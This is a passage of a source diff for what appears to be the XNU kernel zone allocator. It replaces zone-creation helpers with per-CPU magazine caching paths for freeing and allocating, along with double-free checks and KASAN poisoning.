*meta, zone_element_t ze) { -#if KASAN_ZALLOC - if (z->kasan_redzone) { - /* - * Adjust the max memory for the kasan redzones - */ - max += (max / z->pcpu_elem_size) * z->kasan_redzone * 2; - } -#endif - if (max < z->percpu ? 1 : z->alloc_pages) { - max = z->percpu ? 1 : z->alloc_pages; - } else { - max = atop(round_page(max)); - } - z->page_count_max = max; -} + /* transfer preemption count to lock */ + zone_lock_nopreempt_check_contention(zone, NULL); -void -zone_set_submap_idx(zone_t zone, unsigned int sub_map_idx) -{ - if (!zone_is_initializing(zone)) { - panic("%s: called after zone_create()", __func__); - } - if (sub_map_idx > zone_last_submap_idx) { - panic("zone_set_submap_idx(%d) > %d", sub_map_idx, zone_last_submap_idx); - } - zone->submap_idx = sub_map_idx; + zfree_drop(zone, meta, ze, false); + zone_elems_free_add(zone, 1); + + zone_unlock(zone); } -void -zone_set_noexpand( - zone_t zone, - vm_size_t max) +__attribute__((noinline)) +static void +zfree_cached_slow(zone_t zone, struct zone_page_metadata *meta, + zone_element_t ze, zone_cache_t cache) { - if (!zone_is_initializing(zone)) { - panic("%s: called after zone_create()", __func__); + struct zone_depot mags = STAILQ_HEAD_INITIALIZER(mags); + zone_magazine_t mag = NULL; + uint16_t n = 0; + + if (zone_meta_is_free(meta, ze)) { + zone_meta_double_free_panic(zone, ze, __func__); } - zone->expandable = false; - zone_set_max(zone, max); -} -void -zone_set_exhaustible( - zone_t zone, - vm_size_t max) -{ - if (!zone_is_initializing(zone)) { - panic("%s: called after zone_create()", __func__); + if (zone == zc_magazine_zone) { + mag = (zone_magazine_t)zone_element_addr(ze, + zone_elem_size(zone)); +#if KASAN_ZALLOC + kasan_poison_range((vm_offset_t)mag, zone_elem_size(zone), + ASAN_VALID); +#endif + } else { + mag = zone_magazine_alloc(Z_NOWAIT); + if (__improbable(mag == NULL)) { + return zfree_item(zone, meta, ze); + } + mag->zm_cur = 1; + mag->zm_elems[0] = ze; } - zone->expandable = false; - 
zone->exhaustible = true; - zone_set_max(zone, max); -} -/** - * @function zone_create_find - * - * @abstract - * Finds an unused zone for the given name and element size. - * - * @param name the zone name - * @param size the element size (including redzones, ...) - * @param flags the flags passed to @c zone_create* - * @param zid the desired zone ID or ZONE_ID_ANY - * - * @returns a zone to initialize further. - */ -static zone_t -zone_create_find( - const char *name, - vm_size_t size, - zone_create_flags_t flags, - zone_id_t zid) -{ - zone_id_t nzones; - zone_t z; + mag = zone_magazine_replace(&cache->zc_free_cur, + &cache->zc_free_elems, mag); - simple_lock(&all_zones_lock, &zone_locks_grp); + z_debug_assert(cache->zc_free_cur <= 1); + z_debug_assert(mag->zm_cur == zc_mag_size()); - nzones = (zone_id_t)os_atomic_load(&num_zones, relaxed); - assert(num_zones_in_use <= nzones && nzones < MAX_ZONES); + STAILQ_INSERT_HEAD(&mags, mag, zm_link); + n = 1; - if (__improbable(nzones < ZONE_ID__FIRST_DYNAMIC)) { + if (cache->zc_depot_max >= 2 * zc_mag_size()) { /* - * The first time around, make sure the reserved zone IDs - * have an initialized lock as zone_index_foreach() will - * enumerate them. + * If we can use the local depot (zc_depot_max allows for + * 2 magazines worth of elements) then: + * + * 1. if we have space for an extra depot locally, + * push it, and leave. + * + * 2. if we overflow, then take (1 / zc_recirc_denom) + * of the depot out, in order to migrate it to the + * recirculation depot. 
*/ - while (nzones < ZONE_ID__FIRST_DYNAMIC) { - zone_init_defaults(nzones++); - } - - os_atomic_store(&num_zones, nzones, release); - } + zone_depot_lock_nopreempt(cache); - if (zid != ZONE_ID_ANY) { - if (zid >= ZONE_ID__FIRST_DYNAMIC) { - panic("zone_create: invalid desired zone ID %d for %s", - zid, name); + if ((cache->zc_depot_cur + 2) * zc_mag_size() <= + cache->zc_depot_max) { + cache->zc_depot_cur++; + STAILQ_INSERT_TAIL(&cache->zc_depot, mag, zm_link); + return zone_depot_unlock(cache); } - if (flags & ZC_DESTRUCTIBLE) { - panic("zone_create: ID %d (%s) must be permanent", zid, name); - } - if (zone_array[zid].z_self) { - panic("zone_create: creating zone ID %d (%s) twice", zid, name); + + while (zc_recirc_denom * cache->zc_depot_cur * zc_mag_size() >= + (zc_recirc_denom - 1) * cache->zc_depot_max) { + mag = STAILQ_FIRST(&cache->zc_depot); + STAILQ_REMOVE_HEAD(&cache->zc_depot, zm_link); + STAILQ_INSERT_TAIL(&mags, mag, zm_link); + cache->zc_depot_cur--; + n++; } - z = &zone_array[zid]; + + zone_depot_unlock(cache); } else { - if (flags & ZC_DESTRUCTIBLE) { - /* - * If possible, find a previously zdestroy'ed zone in the - * zone_array that we can reuse. - */ - for (int i = bitmap_first(zone_destroyed_bitmap, MAX_ZONES); - i >= 0; i = bitmap_next(zone_destroyed_bitmap, i)) { - z = &zone_array[i]; + enable_preemption(); + } - /* - * If the zone name and the element size are the - * same, we can just reuse the old zone struct. - */ - if (strcmp(z->z_name, name) || zone_elem_size(z) != size) { - continue; - } - bitmap_clear(zone_destroyed_bitmap, i); - z->destroyed = false; - z->z_self = z; - zid = (zone_id_t)i; - goto out; - } + /* + * Preflight validity of all the elements before we touch the zone + * metadata, and then insert them into the recirculation depot. 
+ */ + STAILQ_FOREACH(mag, &mags, zm_link) { + for (uint16_t i = 0; i < zc_mag_size(); i++) { + zone_element_validate(zone, mag->zm_elems[i]); } + } - zid = nzones++; - z = zone_init_defaults(zid); + zone_lock_check_contention(zone, cache); - /* - * The release barrier pairs with the acquire in - * zone_index_foreach() and makes sure that enumeration loops - * always see an initialized zone lock. - */ - os_atomic_store(&num_zones, nzones, release); + STAILQ_FOREACH(mag, &mags, zm_link) { + for (uint16_t i = 0; i < zc_mag_size(); i++) { + zone_element_t e = mag->zm_elems[i]; + + if (!zone_meta_mark_free(zone_meta_from_element(e), e)) { + zone_meta_double_free_panic(zone, e, __func__); + } + } } + STAILQ_CONCAT(&zone->z_recirc, &mags); + zone->z_recirc_cur += n; -out: - num_zones_in_use++; - simple_unlock(&all_zones_lock); + zone_elems_free_add(zone, n * zc_mag_size()); - return z; + zone_unlock(zone); } -__abortlike static void -zone_create_panic(const char *name, const char *f1, const char *f2) +zfree_cached(zone_t zone, struct zone_page_metadata *meta, zone_element_t ze) { - panic("zone_create: creating zone %s: flag %s and %s are incompatible", - name, f1, f2); -} -#define zone_create_assert_not_both(name, flags, current_flag, forbidden_flag) \ - if ((flags) & forbidden_flag) { \ - zone_create_panic(name, #current_flag, #forbidden_flag); \ + zone_cache_t cache = zpercpu_get(zone->z_pcpu_cache); + + if (cache->zc_free_cur >= zc_mag_size()) { + if (cache->zc_alloc_cur >= zc_mag_size()) { + return zfree_cached_slow(zone, meta, ze, cache); + } + zone_cache_swap_magazines(cache); + } + + if (__improbable(cache->zc_alloc_elems == NULL)) { + return zfree_item(zone, meta, ze); + } + + if (zone_meta_is_free(meta, ze)) { + zone_meta_double_free_panic(zone, ze, __func__); + } + + uint16_t idx = cache->zc_free_cur++; + if (idx >= zc_mag_size()) { + zone_accounting_panic(zone, "zc_free_cur overflow"); } + cache->zc_free_elems[idx] = ze; + + enable_preemption(); +} /* - * 
Adjusts the size of the element based on minimum size, alignment - * and kasan redzones + * The function is noinline when zlog can be used so that the backtracing can + * reliably skip the zfree_ext() and zfree_log_trace() + * boring frames. */ -static vm_size_t -zone_elem_adjust_size( - const char *name __unused, - vm_size_t elem_size, - zone_create_flags_t flags, - vm_size_t *redzone __unused) +#if ZONE_ENABLE_LOGGING +__attribute__((noinline)) +#endif /* ZONE_ENABLE_LOGGING */ +void +zfree_ext(zone_t zone, zone_stats_t zstats, void *addr) { - vm_size_t size; + struct zone_page_metadata *page_meta; + vm_offset_t elem = (vm_offset_t)addr; + vm_size_t elem_size = zone_elem_size(zone); + zone_element_t ze; + + DTRACE_VM2(zfree, zone_t, zone, void*, addr); + TRACE_MACHLEAKS(ZFREE_CODE, ZFREE_CODE_2, elem_size, elem); +#if VM_MAX_TAG_ZONES + if (__improbable(zone->tags)) { + vm_tag_t tag = *ztSlot(zone, elem) >> 1; + // set the tag with b0 clear so the block remains inuse + *ztSlot(zone, elem) = 0xFFFE; + vm_tag_update_zone_size(tag, zone->tag_zone_index, + -(long)elem_size); + } +#endif /* VM_MAX_TAG_ZONES */ + +#if KASAN_ZALLOC + if (kasan_quarantine_freed_element(&zone, &addr)) { + return; + } + /* + * kasan_quarantine_freed_element() might return a different + * {zone, addr} than the one being freed for kalloc heaps. + * + * Make sure we reload everything. 
+ */ + elem = (vm_offset_t)addr; + elem_size = zone_elem_size(zone); +#endif +#if CONFIG_ZLEAKS /* - * Adjust element size for minimum size and pointer alignment + * Zone leak detection: un-track the allocation */ - size = (elem_size + sizeof(vm_offset_t) - 1) & -sizeof(vm_offset_t); - if (((flags & ZC_PERCPU) == 0) && size < ZONE_MIN_ELEM_SIZE) { - size = ZONE_MIN_ELEM_SIZE; + if (__improbable(zone->zleak_on)) { + zleak_free(elem, elem_size); + } +#endif /* CONFIG_ZLEAKS */ +#if ZONE_ENABLE_LOGGING + if (__improbable(DO_LOGGING(zone))) { + zfree_log_trace(zone, elem, __builtin_frame_address(0)); + } +#endif /* ZONE_ENABLE_LOGGING */ +#if CONFIG_GZALLOC + if (__improbable(zone->gzalloc_tracked)) { + return gzalloc_free(zone, zstats, addr); } +#endif /* CONFIG_GZALLOC */ + page_meta = zone_element_resolve(zone, elem, elem_size, &ze); + ze.ze_value |= zfree_clear_or_poison(zone, elem, elem_size); #if KASAN_ZALLOC - /* - * Expand the zone allocation size to include the redzones. - * - * For page-multiple zones add a full guard page because they - * likely require alignment. 
- */ - vm_size_t redzone_tmp; - if (flags & (ZC_KASAN_NOREDZONE | ZC_PERCPU)) { - redzone_tmp = 0; - } else if ((size & PAGE_MASK) == 0) { - if (size != PAGE_SIZE && (flags & ZC_ALIGNMENT_REQUIRED)) { - panic("zone_create: zone %s can't provide more than PAGE_SIZE" - "alignment", name); + if (zone->z_percpu) { + zpercpu_foreach_cpu(i) { + kasan_poison_range(elem + ptoa(i), elem_size, + ASAN_HEAP_FREED); } - redzone_tmp = PAGE_SIZE; - } else if (flags & ZC_ALIGNMENT_REQUIRED) { - redzone_tmp = 0; } else { - redzone_tmp = KASAN_GUARD_SIZE; - } - size += redzone_tmp * 2; - if (redzone) { - *redzone = redzone_tmp; + kasan_poison_range(elem, elem_size, ASAN_HEAP_FREED); } #endif - return size; + + disable_preemption(); + zpercpu_get(zstats)->zs_mem_freed += elem_size; + + if (zone->z_pcpu_cache) { + return zfree_cached(zone, page_meta, ze); + } + + return zfree_item(zone, page_meta, ze); } -/* - * Returns the allocation chunk size that has least framentation - */ -static vm_size_t -zone_get_min_alloc_granule( - vm_size_t elem_size, - zone_create_flags_t flags) +void +(zfree)(union zone_or_view zov, void *addr) { - vm_size_t alloc_granule = PAGE_SIZE; - if (flags & ZC_PERCPU) { - alloc_granule = PAGE_SIZE * zpercpu_count(); - if (PAGE_SIZE % elem_size > 256) { - panic("zone_create: per-cpu zone has too much fragmentation"); - } - } else if ((elem_size & PAGE_MASK) == 0) { - /* zero fragmentation by definition */ - alloc_granule = elem_size; - } else if (alloc_granule % elem_size == 0) { - /* zero fragmentation by definition */ - } else { - vm_size_t frag = (alloc_granule % elem_size) * 100 / alloc_granule; - vm_size_t alloc_tmp = PAGE_SIZE; - while ((alloc_tmp += PAGE_SIZE) <= ZONE_MAX_ALLOC_SIZE) { - vm_size_t frag_tmp = (alloc_tmp % elem_size) * 100 / alloc_tmp; - if (frag_tmp < frag) { - frag = frag_tmp; - alloc_granule = alloc_tmp; - } - } - } - return alloc_granule; + zone_t zone = zov.zov_view->zv_zone; + zone_stats_t zstats = zov.zov_view->zv_stats; + 
assert(!zone->z_percpu); + zfree_ext(zone, zstats, addr); } -vm_size_t -zone_get_foreign_alloc_size( - const char *name __unused, - vm_size_t elem_size, - zone_create_flags_t flags, - uint16_t min_pages) +void +zfree_percpu(union zone_or_view zov, void *addr) { - vm_size_t adjusted_size = zone_elem_adjust_size(name, elem_size, flags, - NULL); - vm_size_t alloc_granule = zone_get_min_alloc_granule(adjusted_size, - flags); - vm_size_t min_size = min_pages * PAGE_SIZE; - /* - * Round up min_size to a multiple of alloc_granule - */ - return ((min_size + alloc_granule - 1) / alloc_granule) - * alloc_granule; + zone_t zone = zov.zov_view->zv_zone; + zone_stats_t zstats = zov.zov_view->zv_stats; + assert(zone->z_percpu); + zfree_ext(zone, zstats, (void *)__zpcpu_demangle(addr)); } -zone_t -zone_create_ext( - const char *name, - vm_size_t size, - zone_create_flags_t flags, - zone_id_t desired_zid, - void (^extra_setup)(zone_t)) +/*! @} */ +#endif /* !ZALLOC_TEST */ +#pragma mark zalloc +#if !ZALLOC_TEST + +/*! + * @defgroup zalloc + * @{ + * + * @brief + * The codepath for zone allocations. + * + * @discussion + * There are 4 major ways to allocate memory that end up in the zone allocator: + * - @c zalloc(), @c zalloc_flags(), ... + * - @c zalloc_percpu() + * - @c kalloc*() + * - @c zalloc_permanent() + * + * While permanent zones have their own allocation scheme, all other codepaths + * will eventually go through the @c zalloc_ext() choking point. 
+ * + * Ignoring the @c zalloc_gz() codepath, the decision tree looks like this: + * + * zalloc_ext() + * │ + * ├───> zalloc_cached() ──────> zalloc_cached_fast() ───╮ + * │ │ ^ │ + * │ │ │ │ + * │ ╰───> zalloc_cached_slow() ───╯ │ + * │ │ │ + * │<─────────────────╮ ├─────────────╮ │ + * │ │ │ │ │ + * │ │ v │ │ + * │<───────╮ ╭──> zalloc_item_slow() ────┤ │ + * │ │ │ │ │ + * │ │ │ v │ + * ╰───> zalloc_item() ──────────> zalloc_item_fast() ───┤ + * │ + * v + * zalloc_return() + * + * + * + * The @c zalloc_item() track is used when zone caching is off: + * - @c zalloc_item_fast() is used when there are enough elements available, + * - @c zalloc_item_slow() is used when a refill is needed, which can cause + * the zone to grow. This is the only codepath that refills. + * + * This track uses the zone lock for serialization: + * - taken in @c zalloc_item(), + * - maintained during @c zalloc_item_slow() (possibly dropped and re-taken), + * - dropped in @c zalloc_item_fast(). + * + * + * The @c zalloc_cached() track is used when zone caching is on: + * - @c zalloc_cached_fast() is taken when the cache has elements, + * - @c zalloc_cached_slow() is taken if a cache refill is needed. + * It can chose many strategies: + * ~ @c zalloc_cached_from_depot() to try to reuse cpu stashed magazines, + * ~ using the global recirculation depot @c z_recirc, + * ~ using zalloc_import() if the zone has enough elements, + * ~ falling back to the @c zalloc_item() track if zone caching is disabled + * due to VM pressure or the zone has no available elements. + * + * This track disables preemption for serialization: + * - preemption is disabled in @c zalloc_cached(), + * - kept disabled during @c zalloc_cached_slow(), converted into a zone lock + * if switching to @c zalloc_item_slow(), + * - preemption is reenabled in @c zalloc_cached_fast(). + * + * @c zalloc_cached_from_depot() also takes depot locks (taken by the caller, + * released by @c zalloc_cached_from_depot(). 
+ * + * In general the @c zalloc_*_slow() codepaths deal with refilling and will + * tail call into the @c zalloc_*_fast() code to perform the actual allocation. + * + * @c zalloc_return() is the final function everyone tail calls into, + * which prepares the element for consumption by the caller and deals with + * common treatment (zone logging, tags, kasan, validation, ...). + */ + +/*! + * @function zalloc_import + * + * @brief + * Import @c n elements in the specified array, opposite of @c zfree_drop(). + * + * @param zone The zone to import elements from + * @param elems The array to import into + * @param n The number of elements to import. Must be non zero, + * and smaller than @c zone->z_elems_free. + */ +__header_always_inline void +zalloc_import(zone_t zone, zone_element_t *elems, uint32_t n) { - vm_size_t alloc; - vm_size_t redzone; - zone_t z; + vm_size_t esize = zone_elem_size(zone); + uint32_t i = 0; - if (size > ZONE_MAX_ALLOC_SIZE) { - panic("zone_create: element size too large: %zd", (size_t)size); - } + assertf(STAILQ_EMPTY(&zone->z_recirc), + "Trying to import from zone %p [%s%s] with non empty recirc", + zone, zone_heap_name(zone), zone_name(zone)); - size = zone_elem_adjust_size(name, size, flags, &redzone); - /* - * Allocate the zone slot, return early if we found an older match. 
- */ - z = zone_create_find(name, size, flags, desired_zid); - if (__improbable(z->z_self)) { - /* We found a zone to reuse */ - return z; - } + do { + vm_offset_t page, eidx, size = 0; + struct zone_page_metadata *meta; + + if (!zone_pva_is_null(zone->z_pageq_partial)) { + meta = zone_pva_to_meta(zone->z_pageq_partial); + page = zone_pva_to_addr(zone->z_pageq_partial); + } else if (!zone_pva_is_null(zone->z_pageq_empty)) { + meta = zone_pva_to_meta(zone->z_pageq_empty); + page = zone_pva_to_addr(zone->z_pageq_empty); + zone_counter_sub(zone, z_wired_empty, meta->zm_chunk_len); + } else { + zone_accounting_panic(zone, "z_elems_free corruption"); + } - /* - * Initialize the zone properly. - */ + if (!zone_has_index(zone, meta->zm_index)) { + zone_page_metadata_index_confusion_panic(zone, page, meta); + } - /* - * If the kernel is post lockdown, copy the zone name passed in. - * Else simply maintain a pointer to the name string as it can only - * be a core XNU zone (no unloadable kext exists before lockdown). - */ - if (startup_phase >= STARTUP_SUB_LOCKDOWN) { - size_t nsz = MIN(strlen(name) + 1, MACH_ZONE_NAME_MAX_LEN); - char *buf = zalloc_permanent(nsz, ZALIGN_NONE); - strlcpy(buf, name, nsz); - z->z_name = buf; + vm_offset_t old_size = meta->zm_alloc_size; + vm_offset_t max_size = ptoa(meta->zm_chunk_len) + ZM_ALLOC_SIZE_LOCK; + + do { + eidx = zone_meta_find_and_clear_bit(zone, meta); + elems[i++] = zone_element_encode(page, eidx, ZPM_AUTO); + size += esize; + } while (i < n && old_size + size + esize <= max_size); + + vm_offset_t new_size = zone_meta_alloc_size_add(zone, meta, size); + + if (new_size + esize > max_size) { + zone_meta_requeue(zone, &zone->z_pageq_full, meta); + } else if (old_size == 0) { + /* remove from free, move to intermediate */ + zone_meta_requeue(zone, &zone->z_pageq_partial, meta); + } + } while (i < n); +} + +/*! 
+ * @function zalloc_return + * + * @brief + * Performs the tail-end of the work required on allocations before the caller + * uses them. + * + * @discussion + * This function is called without any zone lock held, + * and preemption back to the state it had when @c zalloc_ext() was called. + * + * @param zone The zone we're allocating from. + * @param ze The encoded element we just allocated. + * @param flags The flags passed to @c zalloc_ext() (for Z_ZERO). + * @param elem_size The element size for this zone. + * @param freemag An optional magazine that needs to be freed. + */ +__attribute__((noinline)) +static void * +zalloc_return(zone_t zone, zone_element_t ze, zalloc_flags_t flags, + vm_offset_t elem_size, zone_magazine_t freemag) +{ + vm_offset_t addr = zone_element_addr(ze, elem_size); + +#if KASAN_ZALLOC + if (zone->z_percpu) { + zpercpu_foreach_cpu(i) { + kasan_poison_range(addr + ptoa(i), elem_size, + ASAN_VALID); + } } else { - z->z_name = name; + kasan_poison_range(addr, elem_size, ASAN_VALID); + } +#endif +#if ZALLOC_ENABLE_POISONING + zalloc_validate_element(zone, addr, elem_size, zone_element_prot(ze)); +#endif /* ZALLOC_ENABLE_POISONING */ +#if ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS + if (__improbable(zalloc_should_log_or_trace_leaks(zone, elem_size))) { + zalloc_log_or_trace_leaks(zone, addr, __builtin_frame_address(0)); + } +#endif /* ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS */ +#if KASAN_ZALLOC + if (zone->z_kasan_redzone) { + addr = kasan_alloc(addr, elem_size, + elem_size - 2 * zone->z_kasan_redzone, + zone->z_kasan_redzone); + elem_size -= 2 * zone->z_kasan_redzone; } /* - * If zone_init() hasn't run yet, the permanent zones do not exist. - * We can limp along without properly initialized stats for a while, - * zone_init() will rebuild the missing stats when it runs. + * Initialize buffer with unique pattern only if memory + * wasn't expected to be zeroed. 
*/ - if (__probable(zone_array[ZONE_ID_PERCPU_PERMANENT].z_self)) { - z->z_stats = zalloc_percpu_permanent_type(struct zone_stats); + if (!zone->z_free_zeroes && !(flags & Z_ZERO)) { + kasan_leak_init(addr, elem_size); + } +#endif /* KASAN_ZALLOC */ + if ((flags & Z_ZERO) && !zone->z_free_zeroes) { + bzero((void *)addr, elem_size); } - alloc = zone_get_min_alloc_granule(size, flags); - - if (flags & ZC_KALLOC_HEAP) { - size_t rem = (alloc % size) / (alloc / size); +#if VM_MAX_TAG_ZONES + if (__improbable(zone->tags)) { + vm_tag_t tag = zalloc_flags_get_tag(flags); + if (tag == VM_KERN_MEMORY_NONE) { + tag = VM_KERN_MEMORY_KALLOC; + } + // set the tag with b0 clear so the block remains inuse + *ztSlot(zone, addr) = (vm_tag_t)(tag << 1); + vm_tag_update_zone_size(tag, zone->tag_zone_index, + (long)elem_size); + } +#endif /* VM_MAX_TAG_ZONES */ - /* - * Try to grow the elements size and spread them more if the remaining - * space is large enough. - */ - size += rem & ~(KALLOC_MINALIGN - 1); + TRACE_MACHLEAKS(ZALLOC_CODE, ZALLOC_CODE_2, elem_size, addr); + DTRACE_VM2(zalloc, zone_t, zone, void*, addr); + if (freemag) { + zone_magazine_free(freemag); } + return (void *)addr; +} - z->pcpu_elem_size = z->z_elem_size = (uint16_t)size; - z->alloc_pages = (uint16_t)atop(alloc); -#if KASAN_ZALLOC - z->kasan_redzone = redzone; - if (strncmp(name, "fakestack.", sizeof("fakestack.") - 1) == 0) { - z->kasan_fakestacks = true; +#if CONFIG_GZALLOC +/*! + * @function zalloc_gz + * + * @brief + * Performs allocations for zones using gzalloc. + * + * @discussion + * This function is noinline so that it doesn't affect the codegen + * of the fastpath. 
+ */ +__attribute__((noinline)) +static void * +zalloc_gz(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags) +{ + vm_offset_t addr = gzalloc_alloc(zone, zstats, flags); + return zalloc_return(zone, zone_element_encode(addr, 0, ZPM_AUTO), + flags, zone_elem_size(zone), NULL); +} +#endif /* CONFIG_GZALLOC */ + +static void * +zalloc_item_fast(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags) +{ + vm_size_t esize = zone_elem_size(zone); + zone_element_t ze; + + zalloc_import(zone, &ze, 1); + zone_elems_free_sub(zone, 1); + zpercpu_get(zstats)->zs_mem_allocated += esize; + zone_unlock(zone); + + return zalloc_return(zone, ze, flags, esize, NULL); +} + +/*! + * @function zalloc_item_slow + * + * @brief + * Performs allocations when the zone is out of elements. + * + * @discussion + * This function might drop the lock and reenable preemption, + * which means the per-CPU caching layer or recirculation depot + * might have received elements. + */ +__attribute__((noinline)) +static void * +zalloc_item_slow(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags) +{ + if (zone->z_replenishes) { + zone_replenish_locked(zone); + } else { + if ((flags & Z_NOWAIT) == 0) { + zone_expand_locked(zone, flags, zalloc_needs_refill); + } + if (flags & (Z_NOWAIT | Z_NOPAGEWAIT)) { + zone_expand_async_schedule_if_needed(zone); + } + if (__improbable(zone->z_elems_free == 0)) { + zone_unlock(zone); + if (__improbable(flags & Z_NOFAIL)) { + zone_nofail_panic(zone); + } + DTRACE_VM2(zalloc, zone_t, zone, void*, NULL); + return NULL; + } } -#endif /* - * Handle KPI flags + * We might have changed core or got preempted/blocked while expanding + * the zone. Allocating from the zone when the recirculation depot + * is not empty is not allowed. + * + * It will be rare but possible for the depot to refill while we were + * waiting for pages. If that happens we need to start over. 
*/ -#if __LP64__ - if (flags & ZC_SEQUESTER) { - z->va_sequester = true; + if (!STAILQ_EMPTY(&zone->z_recirc)) { + zone_unlock(zone); + return zalloc_ext(zone, zstats, flags); } -#endif - /* ZC_CACHING applied after all configuration is done */ - if (flags & ZC_PERCPU) { - /* - * ZC_CACHING is disallowed because it uses per-cpu zones for its - * implementation and it would be circular. These allocations are - * also quite expensive, so caching feels dangerous memory wise too. - * - * ZC_ZFREE_CLEARMEM is forced because per-cpu zones allow for - * pointer-sized allocations which poisoning doesn't support. - */ - zone_create_assert_not_both(name, flags, ZC_PERCPU, ZC_CACHING); - zone_create_assert_not_both(name, flags, ZC_PERCPU, ZC_ALLOW_FOREIGN); - z->percpu = true; - z->gzalloc_exempt = true; - z->zfree_clear_mem = true; - z->pcpu_elem_size *= zpercpu_count(); - } - if (flags & ZC_ZFREE_CLEARMEM) { - z->zfree_clear_mem = true; - } - if (flags & ZC_NOGC) { - z->collectable = false; - } - if (flags & ZC_NOENCRYPT) { - z->noencrypt = true; - } - if (flags & ZC_ALIGNMENT_REQUIRED) { - z->alignment_required = true; - } - if (flags & ZC_NOGZALLOC) { - z->gzalloc_exempt = true; - } - if (flags & ZC_NOCALLOUT) { - z->no_callout = true; - } - if (flags & ZC_DESTRUCTIBLE) { - zone_create_assert_not_both(name, flags, ZC_DESTRUCTIBLE, ZC_CACHING); - zone_create_assert_not_both(name, flags, ZC_DESTRUCTIBLE, ZC_ALLOW_FOREIGN); - z->destructible = true; - } + return zalloc_item_fast(zone, zstats, flags); +} + +/*! + * @function zalloc_item + * + * @brief + * Performs allocations when zone caching is off. + * + * @discussion + * This function calls @c zalloc_item_slow() when refilling the zone + * is needed, or @c zalloc_item_fast() if the zone has enough free elements. 
+ */ +static void * +zalloc_item(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags) +{ + zone_lock_check_contention(zone, NULL); /* - * Handle Internal flags + * When we commited to the zalloc_item() path, + * zone caching might have been flipped/enabled. + * + * If we got preempted for long enough, the recirculation layer + * can have been populated, and allocating from the zone would be + * incorrect. + * + * So double check for this extremely rare race here. */ - if (flags & ZC_ALLOW_FOREIGN) { - z->allows_foreign = true; + if (__improbable(!STAILQ_EMPTY(&zone->z_recirc))) { + zone_unlock(zone); + return zalloc_ext(zone, zstats, flags); } - if ((ZSECURITY_OPTIONS_SUBMAP_USER_DATA & zsecurity_options) && - (flags & ZC_DATA_BUFFERS)) { - z->submap_idx = Z_SUBMAP_IDX_BAG_OF_BYTES_MAP; + + if (__improbable(zone->z_elems_free <= zone->z_elems_rsv)) { + return zalloc_item_slow(zone, zstats, flags); } - if (flags & ZC_KASAN_NOQUARANTINE) { - z->kasan_noquarantine = true; + + return zalloc_item_fast(zone, zstats, flags); +} + +static void * +zalloc_cached_fast(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags, + zone_cache_t cache, zone_magazine_t freemag) +{ + vm_offset_t esize = zone_elem_size(zone); + zone_element_t ze; + uint32_t index; + + index = --cache->zc_alloc_cur; + if (index >= zc_mag_size()) { + zone_accounting_panic(zone, "zc_alloc_cur wrap around"); } - /* ZC_KASAN_NOREDZONE already handled */ + ze = cache->zc_alloc_elems[index]; + cache->zc_alloc_elems[index].ze_value = 0; - /* - * Then if there's extra tuning, do it - */ - if (extra_setup) { - extra_setup(z); + zpercpu_get(zstats)->zs_mem_allocated += esize; + enable_preemption(); + + if (zone_meta_is_free(zone_meta_from_element(ze), ze)) { + zone_meta_double_free_panic(zone, ze, __func__); } - /* - * Configure debugging features - */ -#if CONFIG_GZALLOC - gzalloc_zone_init(z); /* might set z->gzalloc_tracked */ -#endif -#if ZONE_ENABLE_LOGGING - if (!z->gzalloc_tracked && num_zones_logged < 
max_num_zones_to_log) { - /* - * Check for and set up zone leak detection if requested via boot-args. - * might set z->zone_logging - */ - zone_setup_logging(z); + return zalloc_return(zone, ze, flags, esize, freemag); +} + +static void * +zalloc_cached_from_depot(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags, + zone_cache_t cache, zone_cache_t depot, zone_magazine_t mag) +{ + STAILQ_REMOVE_HEAD(&depot->zc_depot, zm_link); + if (depot->zc_depot_cur-- == 0) { + zone_accounting_panic(zone, "zc_depot_cur wrap-around"); } -#endif /* ZONE_ENABLE_LOGGING */ -#if VM_MAX_TAG_ZONES - if (!z->gzalloc_tracked && z->kalloc_heap && zone_tagging_on) { - static int tag_zone_index; - vm_offset_t esize = zone_elem_size(z); - z->tags = true; - z->tags_inline = (((page_size + esize - 1) / esize) <= - (sizeof(uint32_t) / sizeof(uint16_t))); - z->tag_zone_index = os_atomic_inc_orig(&tag_zone_index, relaxed); - assert(z->tag_zone_index < VM_MAX_TAG_ZONES); + zone_depot_unlock_nopreempt(depot); + + mag = zone_magazine_replace(&cache->zc_alloc_cur, + &cache->zc_alloc_elems, mag); + + z_debug_assert(cache->zc_alloc_cur == zc_mag_size()); + z_debug_assert(mag->zm_cur == 0); + + if (zone == zc_magazine_zone) { + enable_preemption(); + bzero(mag, zone_elem_size(zone)); + return mag; } -#endif + + return zalloc_cached_fast(zone, zstats, flags, cache, mag); +} + +__attribute__((noinline)) +static void * +zalloc_cached_slow(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags, + zone_cache_t cache) +{ + zone_magazine_t mag = NULL; + struct zone_depot mags = STAILQ_HEAD_INITIALIZER(mags); /* - * Finally, fixup properties based on security policies, boot-args, ... + * Try to allocate from our local depot, if there's one. 
*/ - if ((ZSECURITY_OPTIONS_SUBMAP_USER_DATA & zsecurity_options) && - z->kalloc_heap == KHEAP_ID_DATA_BUFFERS) { - z->submap_idx = Z_SUBMAP_IDX_BAG_OF_BYTES_MAP; - } -#if __LP64__ - if ((ZSECURITY_OPTIONS_SEQUESTER & zsecurity_options) && - (flags & ZC_NOSEQUESTER) == 0 && - z->submap_idx == Z_SUBMAP_IDX_GENERAL_MAP) { - z->va_sequester = true; + if (STAILQ_FIRST(&cache->zc_depot)) { + zone_depot_lock_nopreempt(cache); + + if ((mag = STAILQ_FIRST(&cache->zc_depot)) != NULL) { + return zalloc_cached_from_depot(zone, zstats, flags, + cache, cache, mag); + } + + zone_depot_unlock_nopreempt(cache); } -#endif + + zone_lock_nopreempt_check_contention(zone, cache); + /* - * Always clear zone elements smaller than a cacheline, - * because it's pretty close to free. + * If the recirculation depot is empty, we'll need to import. + * The system is tuned for this to be extremely rare. */ - if (size <= zp_min_size) { - z->zfree_clear_mem = true; - } - if (zp_factor != 0 && !z->zfree_clear_mem) { - z->zp_count = zone_poison_count_init(z); - } + if (__improbable(STAILQ_EMPTY(&zone->z_recirc))) { + uint16_t n_elems = zc_mag_size(); -#if CONFIG_ZCACHE - if ((flags & ZC_NOCACHING) == 0) { - /* - * Append kalloc heap name to zone 